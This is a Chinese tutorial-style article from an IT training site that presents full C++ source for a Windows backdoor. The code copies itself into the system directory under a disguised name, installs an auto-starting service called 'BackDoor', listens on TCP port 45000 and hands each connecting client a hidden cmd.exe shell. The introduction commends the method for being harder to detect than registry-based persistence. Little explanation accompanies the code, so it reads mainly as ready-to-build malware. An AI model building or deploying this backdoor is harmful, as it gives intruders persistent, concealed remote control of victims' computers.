C++语言实现后门的服务自启动
小标 2018-07-25 来源 : 阅读 1343 评论 0

摘要:本文主要向大家介绍了C++语言实现后门的服务自启动,通过具体的内容向大家展示,希望对大家学习C++语言有所帮助。

本文主要向大家介绍了C++语言实现后门的服务自启动,通过具体的内容向大家展示,希望对大家学习C++语言有所帮助。

简介

Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。

C++代码样例

//////////////////////////////////////////////////////////////

//

// FileName : ServiceAutoRunDemo.cpp

// Creator : PeterZ1997

// Date : 2018-5-4 23:19

// Comment : Create Service to make the BackDoor Run Automatically

//

//////////////////////////////////////////////////////////////

 

#include <iostream>

#include <winsock2.h>

#include <winsock.h>

#include <windows.h>

#include <winsvc.h>

#include <cstdio>

#include <cstring>

#pragma comment(lib, "ws2_32.lib")

 

using namespace std;

 

#define SERVICE_OP_ERROR -1

#define SERVICE_ALREADY_RUN -2

 

const unsigned int MAX_COUNT = 255; /// String Max Length

const DWORD PORT = 45000;           /// Listen Port

const unsigned int LINK_COUNT = 30; /// Max Link Number

 

SERVICE_STATUS g_ServiceStatus;

SERVICE_STATUS_HANDLE g_hServiceStatus;

 

/**

 * @brief CallBack Function to Translate Service Control Code

 * @param dwCode Service Control Code

 */

void WINAPI ServiceControl(DWORD dwCode)

{

    switch (dwCode)

    {

        //服务暂停

    case SERVICE_CONTROL_PAUSE:

        g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;

        break;

        //服务继续

    case SERVICE_CONTROL_CONTINUE:

        g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;

        break;

        //服务停止

    case SERVICE_CONTROL_STOP:

        g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;

        g_ServiceStatus.dwWin32ExitCode = 0;

        g_ServiceStatus.dwCheckPoint = 0;

        g_ServiceStatus.dwWaitHint = 0;

        break;

    case SERVICE_CONTROL_INTERROGATE:

        break;

    default:

        break;

    }

    //设置服务状态

    if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0)

    {

        printf("Set Service Status Error\n");

    }

    return;

}

 

/**

 * @brief Start Remote Shell

 * @lpParam the Client Handle

 */

DWORD WINAPI StartShell(LPVOID lpParam)

{

    STARTUPINFO si;

    PROCESS_INFORMATION pi;

    CHAR cmdline[MAX_COUNT] = { 0 };

    GetStartupInfo(&si);

    si.cb = sizeof(STARTUPINFO);

    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam;

    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

    si.wShowWindow = SW_HIDE;

    GetSystemDirectory(cmdline, sizeof(cmdline));

    strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe");

    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))

    {

        Sleep(100);

    }

    WaitForSingleObject(pi.hProcess, INFINITE);

    CloseHandle(pi.hProcess);

    CloseHandle(pi.hThread);

    return 0;

}

 

/**

 * @brief Service Running Function

 * @lpParam NULL

 */

DWORD WINAPI RunService(LPVOID lpParam)

{

    CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";

    SOCKET sClient[30];

    DWORD dwThreadId[30];

    HANDLE hThread[30];

    WSADATA wsd;

    if (WSAStartup(0x0202, &wsd))

    {

        printf("WSAStartup Process Error\n");

        return 0;

    }

    SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

    sockaddr_in sin;

    sin.sin_family = AF_INET;

    sin.sin_port = htons(PORT);

    sin.sin_addr.S_un.S_addr = INADDR_ANY;

    if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0;

    if (listen(sListen, LINK_COUNT)) return 0;

    for (int i = 0; i < LINK_COUNT; i++)

    {

        sClient[i] = accept(sListen, NULL, NULL);

        hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]);

        send(sClient[i], wMessage, strlen(wMessage), 0);

    }

    WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE);

    return 0;

}

 

/**

 * @brief the Main Function of the Service

 */

void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)

{

    HANDLE hThread;

    g_ServiceStatus.dwCheckPoint = 0;

    g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;

    g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;

    g_ServiceStatus.dwServiceSpecificExitCode = 0;

    g_ServiceStatus.dwServiceType = SERVICE_WIN32;

    g_ServiceStatus.dwWaitHint = 0;

    g_ServiceStatus.dwWin32ExitCode = 0;

    g_hServiceStatus = RegisterServiceCtrlHandler("BackDoor", ServiceControl);

    if (!g_hServiceStatus)

    {

        printf("Register Service Error\n");

        return;

    }

    g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;

    g_ServiceStatus.dwCheckPoint = 0;

    g_ServiceStatus.dwWaitHint = 0;

    if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus))

    {

        OutputDebugString("SetServiceStatus Error !\n");

        return;

    }

    hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);

    if (!hThread)

    {

        printf("Create Thread Error\n");

    }

    return;

}

 

/**

 * @brief Install Service

 */

int APIENTRY InstallService()

{

    DWORD dwErrorCode;

    SC_HANDLE hscManager;

    SC_HANDLE hServiceHandle;

    SERVICE_STATUS ssServiceStatus;

    CHAR szSystemPath[MAX_COUNT] = "\0";

    CHAR szFileSelfPath[MAX_COUNT] = "\0";

    GetSystemDirectory(szSystemPath, sizeof(szSystemPath));

    GetModuleFileName(NULL, szFileSelfPath, sizeof(szFileSelfPath));

    strcat_s(szSystemPath, "\\sysWork.exe");

    CopyFile(szFileSelfPath, szSystemPath, true);

    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

    if (!hscManager)

    {

        printf("Can not Open the Service Manager\n");

        return SERVICE_OP_ERROR;

    }

    printf("Service Manager Opened Success\n");

    hServiceHandle = CreateService(hscManager, "BackDoor", "BackDoor", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, szSystemPath, NULL, NULL, NULL, NULL, NULL);

    if (!hServiceHandle)

    {

        dwErrorCode = GetLastError();

        if (dwErrorCode == ERROR_SERVICE_EXISTS)

        {

            hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);

            if (!hServiceHandle)

            {

                printf("Can not Create/Open Service\n");

                CloseServiceHandle(hServiceHandle);

                return SERVICE_OP_ERROR;

            }

            else

            {

                printf("Service Opened Success\n");

            }

        }

    }

    else {

        printf("Service Create Success\n");

    }

    if (!StartService(hServiceHandle, 0, NULL))

    {

        dwErrorCode = GetLastError();

        if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)

        {

            printf("SERVEICE IS ALREADY RUNNING\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_ALREADY_RUN;

        }

        else

        {

            printf("SERVEICE START ERROR\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_OP_ERROR;

        }

    }

    while (QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        if (ssServiceStatus.dwCurrentState == SERVICE_START_PENDING)

        {

            Sleep(100);

            continue;

        }

        if (ssServiceStatus.dwCurrentState != SERVICE_RUNNING)

        {

            printf("Service Start Process ERROR\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_OP_ERROR;

        }

        else

        {

            break;

        }

    }

    if (!QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        printf("Service Status Get Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    printf("Service Start Success\n");

    CloseServiceHandle(hServiceHandle);

    CloseServiceHandle(hscManager);

    return 0;

}

 

 

/**

 * @brief Remove Service

 */

int RemoveService()

{

    SC_HANDLE hscManager;

    SC_HANDLE hServiceHandle;

    SERVICE_STATUS ssServiceStatus;

    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

    if (!hscManager)

    {

        printf("Open Service Manager Error\n");

        return SERVICE_OP_ERROR;

    }

    printf("Open Service Manager Success\n");

    hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);

    if (!hServiceHandle)

    {

        printf("Open Service Error\n");

        return SERVICE_OP_ERROR;

    }

    printf("Open Service Success\n");

    if (QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        if (ssServiceStatus.dwCurrentState == SERVICE_RUNNING)

        {

            ControlService(hServiceHandle, SERVICE_STOP, &ssServiceStatus);

        }

    }

    else

    {

        printf("Service Status Get Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    if (!DeleteService(hServiceHandle))

    {

        printf("Delete Service Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    printf("Remove Service Success\n");

    CloseServiceHandle(hServiceHandle);

    CloseServiceHandle(hscManager);

    return 0;

}

 

/**

 * @brief main Function

 */

int main(int argc, char* argv[])

{

    SERVICE_TABLE_ENTRY svTable[] = {

        {(LPSTR)"BackDoor",ServiceMain},

        {NULL,NULL}

    };

    StartServiceCtrlDispatcher(svTable);

    if (argc == 2)

    {

        if (!stricmp(argv[1], "--install"))

        {

            if (InstallService()&SERVICE_OP_ERROR)

            {

                printf("[!]Service Operation Error\n");

            }

            else

            {

                printf("[*]Service Operation Success\n");

            }

        }

        else if (!stricmp(argv[1], "--remove"))

        {

            if (RemoveService()&SERVICE_OP_ERROR)

            {

                printf("[!]Service Operation Error\n");

            }

            else

            {

                printf("[*]Service Operation Success\n");

            }

        }

        else

        {

            printf("[Usage] => *.exe [--install]/[--remove]\n");

        }

    }

    else {

        printf("[Usage] => *.exe [--install]/[--remove]\n");

    }

    return 0;

}

</cstring></cstdio></wins</windows.h></winsock.h></winsock2.h></iostream>

本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注职坐标编程语言C/C+频道!


本文由 @小标 发布于职坐标。未经许可,禁止转载。
喜欢 | 1 不喜欢 | 0
看完这篇文章有何感觉?已经有1人表态,100%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论

您输入的评论内容中包含违禁敏感词

我知道了

助您圆梦职场 匹配合适岗位
验证码手机号,获得海同独家IT培训资料
选择就业方向:
人工智能物联网
大数据开发/分析
人工智能Python
Java全栈开发
WEB前端+H5

请输入正确的手机号码

请输入正确的验证码

获取验证码

您今天的短信下发次数太多了,明天再试试吧!

提交

我们会在第一时间安排职业规划师联系您!

您也可以联系我们的职业规划师咨询:

小职老师的微信号:z_zhizuobiao
小职老师的微信号:z_zhizuobiao

版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    

©2015 www.zhizuobiao.com All Rights Reserved

208小时内训课程